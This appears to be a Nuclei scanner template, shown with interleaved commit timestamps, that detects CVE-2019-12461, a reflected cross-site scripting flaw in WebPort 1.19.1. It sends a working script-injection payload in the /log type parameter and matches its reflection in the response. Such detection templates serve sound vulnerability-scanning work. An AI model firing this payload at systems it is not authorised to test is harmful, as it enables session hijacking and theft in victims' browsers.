2021-01-02 04:59:06 +00:00
id : CVE-2019-12461
2020-09-03 12:37:18 +00:00
info :
2022-08-12 00:45:50 +00:00
name : WebPort 1.19.1 - Cross-Site Scripting
2020-09-03 12:37:18 +00:00
author : pikpikcu
severity : medium
2022-08-12 00:45:50 +00:00
description : Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability.
2021-08-19 13:17:27 +00:00
reference :
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
- https://webport.se/nedladdningar/
2022-05-17 09:18:12 +00:00
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
- https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-12461
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-12461
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.0035
epss-percentile : 0.71796
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : webport
product : web_port
2023-12-05 09:50:33 +00:00
tags : cve,cve2019,xss,webport
2020-09-03 12:37:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-03 12:37:18 +00:00
- method : GET
path :
- '{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E'
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-09-03 12:37:18 +00:00
words :
- '"</script><script>alert(document.domain);</script><script>'
2023-07-11 19:49:27 +00:00
2020-12-13 19:24:23 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-12-13 19:24:23 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100f8a68184a00bd30b2c7e8380fe2352c186c6408c83372b7c32cec79a0e41f3b6022029e2365306b2fed019cbf46e02ce63203a3c5e4672286b5e08367bf26cc52b1e:922c64590222798bb761d5b6d8e72950